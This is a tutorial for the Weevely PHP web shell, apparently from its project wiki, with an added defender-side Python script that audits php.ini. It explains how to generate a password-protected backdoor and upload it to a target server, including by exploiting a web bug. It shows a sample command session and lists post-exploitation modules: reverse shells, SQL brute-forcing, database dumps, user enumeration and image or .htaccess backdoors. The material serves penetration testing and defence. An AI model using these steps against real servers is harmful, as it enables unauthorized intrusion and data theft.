Tutorial
Weevely is a PHP web shell that provides a telnet-like console to execute system commands and automate administration and post-exploitation tasks. Just generate the PHP code, upload it to the target web server, and run the Weevely client locally to transmit shell commands.
Prerequisites
Linux
A basic Python installation is enough to support Weevely on Linux. Some optional modules require third-party software:
To use module :[Link], install httpfs.
To use module :[Link], install beautifulsoup (you can fetch it from APT with sudo apt-get install python-beautifulsoup in a Debian-like environment).
Windows/MacOS
pyreadline is required in a Windows environment. First download and install the setuptools Python package manager utility from the official site, then run %PYTHONPATH%/Scripts/easy_install.exe beautifulsoup4 pyreadline (this will install the optional beautifulsoup package too). The same goes for a MacOS environment.
Server-side installation
Weevely needs a little PHP backdoor to be installed on the target web server. First of all generate the PHP code with:
    # Usage: ./weevely generate <password> [output path]
    $ ./[Link] generate p4ssw0rd [[Link]]
    Backdoor file '[Link]' created with password 'p4ssw0rd'.
Then upload [Link] to the target web server, either through legitimate user access or, during a penetration test, by exploiting a web application bug. Several generators are available; see the Generators list for more information.
Send commands
Weevely automatically detects the best method to execute system commands on the remote host at startup. Here's a sample session:
    # Usage: ./weevely <url> <password>
    $ ./[Link] [Link] p4ssw0rd
    [Weevely ASCII-art banner] v1.0
    Stealth tiny web shell

    [+] Welcome to Weevely. Browse filesystem and execute system commands.
    [+] Hint: Use ':help' to list available modules.

    www-data@[Link]:/var/www/$ uname
    Linux
    www-data@[Link]:/var/www/$ ls /
    bin   cdrom  etc   [Link]  lib64  mnt  proc  run   selinux  sys  usr
    boot  dev    home  lib     media  opt  root  sbin  srv      tmp  var
    www-data@[Link]:/var/www/$
When an overly restrictive PHP configuration prevents system command execution, Weevely falls back to a pure PHP shell (the prompt becomes (PHP)>) that provides built-in versions of the ls and cd commands and still supports module execution.
Single commands can also be executed directly from the command line:
    # Usage: ./weevely <url> <password> "<command>"
    $ ./[Link] [Link] p4ssw0rd "uname"
    Linux
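As an added example (not part of the Weevely wiki or code base), the following defender-side check audits a php.ini for the restrictive configuration mentioned above: it reports whether a PHP file planted on the server could run system commands or would be limited to PHP-level execution. The function list, the helper names and the two sample configurations are assumptions constructed for this example.

```python
# PHP functions that start OS processes. Standard PHP API names; choosing this
# set is an assumption of the example, not something taken from Weevely's source.
EXEC_FUNCS = {"system", "exec", "passthru", "shell_exec",
              "popen", "proc_open", "pcntl_exec"}

def parse_ini(text):
    """Return {directive: value}; the last assignment of a directive wins."""
    conf = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()  # drop ';' comments (naive: ignores quoting)
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        conf[key.strip().lower()] = value.strip().strip('"')
    return conf

def audit(text):
    """Classify what a planted PHP file could still do under this php.ini."""
    conf = parse_ini(text)
    disabled = {f.strip().lower()
                for f in conf.get("disable_functions", "").split(",") if f.strip()}
    open_exec = sorted(EXEC_FUNCS - disabled)
    return {
        "exec_functions_enabled": open_exec,
        # Every process-spawning function disabled: only PHP-level execution is left.
        "exposure": "system-commands" if open_exec else "php-only",
        # open_basedir limits which paths PHP file functions may touch.
        "file_access_confined": bool(conf.get("open_basedir", "")),
    }

# Constructed sample configurations (not from a real server).
DEFAULT_INI = """
[PHP]
disable_functions =
; open_basedir =
"""
HARDENED_INI = """
[PHP]
disable_functions = system,exec,passthru,shell_exec,popen,proc_open,pcntl_exec
open_basedir = "/var/www/:/tmp/"
"""

if __name__ == "__main__":
    for name, ini in (("default", DEFAULT_INI), ("hardened", HARDENED_INI)):
        print(name, audit(ini))
```

Even in the php-only case the fallback shell described above still offers ls, cd and module execution, so disable_functions narrows the exposure rather than removing it.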
Modules
Weevely's modular structure aims to simplify administration and post-exploitation tasks. Full module descriptions are available on the Modules list page.
Show modules help
Run :help to print the module list:
    www-data@[Link]:/var/www/$ :help
    +-----------+------------------------------------------------------+
    | generator | description                                          |
    +-----------+------------------------------------------------------+
    | :[Link]   | Generate backdoored .htaccess                        |
    | :[Link]   | Generate obfuscated PHP backdoor                     |
    | :[Link]   | Backdoor existing image and create related .htaccess |
    +-----------+------------------------------------------------------+
    +------------------+-----------------------------------------------------------------------+
    | module           | description                                                           |
    +------------------+-----------------------------------------------------------------------+
    | :[Link]          | Find wrong system files permissions                                   |
    | :[Link]          | Find wrong file permissions in users home folders                     |
    | :[Link]          | Enumerate users and /etc/passwd content                               |
    | :[Link]          | Crawl and enumerate web folders files permissions                     |
    | :[Link]          | Check php security configurations                                     |
    | :[Link]          | Execute system shell command                                          |
    | :[Link]          | Execute PHP statement                                                 |
    | :[Link]          | Collect system informations                                           |
    | :[Link]          | Find files with matching name                                         |
    | :[Link]          | Find files with write, read, execute permissions                      |
    | :[Link]          | Find files with superuser flags                                       |
    | :[Link]          | Send reverse TCP shell                                                |
    | :[Link]          | Open a shell on TCP port                                              |
    | :[Link]          | Bruteforce all SQL users                                              |
    | :[Link]          | Bruteforce SQL username                                               |
    | :[Link]          | Edit remote file                                                      |
    | :[Link]          | Read remote file                                                      |
    | :[Link]          | Download binary/ascii files from target filesystem                    |
    | :[Link]          | Enumerate remote paths                                                |
    | :file.upload2web | Upload binary/ascii file into web folders and guess corresponding url |
    | :[Link]          | Upload binary/ascii file into target filesystem                       |
    | :[Link]          | Remove remote files and folders                                       |
    | :[Link]          | Check remote files type, md5 and permission                           |
    | :[Link]          | Mount remote filesystem using HTTPfs                                  |
    | :[Link]          | Download binary/ascii files from target filesystem                    |
    | :[Link]          | Run SQL console and single queries                                    |
    | :[Link]          | Get SQL database dump                                                 |
    | :[Link]          | Install and run Proxy to tunnel traffic through target                |
    | :[Link]          | Print interface addresses                                             |
    | :[Link]          | Install remote PHP proxy                                              |
    | :[Link]          | Print interfaces addresses                                            |
    +------------------+-----------------------------------------------------------------------+
    Hint: Run ':help <module>' to print detailed usage informations.
To get detailed information about a module, run :help <module name>.
    www-data@[Link]:/var/www/$ :help [Link]
    usage: :[Link] [-chunksize CHUNKSIZE] [-vector {file_put_contents,fwrite}] [-force] lpath rpath

    Upload binary/ascii file into target filesystem

    positional arguments:
      lpath
      rpath

    optional arguments:
      -chunksize CHUNKSIZE
      -vector {file_put_contents,fwrite}
      -force
    www-data@[Link]:/var/www/$
Module name completion is available by pressing the <tab> key.
Run module
Execute a module with :<module> [options] as described in the help, for example:
    www-data@[Link]:/var/www/$ :[Link] /local/home/[Link] /tmp/[Link]
    True
    www-data@[Link]:/var/www/$ ls -al /tmp/[Link]
    -rw-r--r-- 1 www-data www-data 1812 Jan 9 19:31 /tmp/[Link]
Module options can be set for the entire session by using :set <module> <option>..., where each <option> is an argument=value string. Subsequent module executions will use the specified options.
Script loading
A script is a text file containing one Weevely command per line. To execute a script at runtime, use :load <script path>. Weevely reads a default rc file (~/.weevely/[Link]) at startup; it is used to initialize some parameters before loading modules.
Proxy setting
To run Weevely through an HTTP proxy set the [Link] proxy parameter in the default rc file:
    $ cat ~/.weevely/[Link]
    :set [Link] proxy=[Link]
    $ ./[Link] [Link] p4ssw0rd ":[Link] client_ip"
    [Link]
    www-data@[Link]:/var/www/$
SOCKS4 and SOCKS5 proxies will also work (set socks4://host:port or socks5://host:port respectively).
Last edited by epinna